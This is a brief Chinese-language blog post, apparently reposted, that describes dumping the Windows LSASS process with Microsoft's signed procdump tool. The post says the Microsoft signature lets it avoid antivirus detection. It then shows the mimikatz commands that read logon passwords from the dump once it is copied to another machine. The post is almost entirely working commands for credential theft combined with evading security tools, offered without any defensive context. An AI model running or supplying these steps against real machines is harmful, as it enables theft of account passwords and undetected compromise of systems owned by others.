绕过杀毒软件抓取windows密码

使用procdump,由于是微软的东西,带微软签名杀软不会报毒。
procdump -accepteula -ma lsass.exe lsass.dmp

copy出 lsass.dmp到本机。

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords

具体可以参考原文:

http://blog.gentilkiwi.com/securite/mimikatz/minidump

绕过杀毒软件抓取windows密码,布布扣,bubuko.com

绕过杀毒软件抓取windows密码

上一篇:Windows Server 2012 R2 NAP服务器安装与配置04之 NPS应用DHCP相关设置


下一篇:如何在 Linux 上用密码加密和解密文件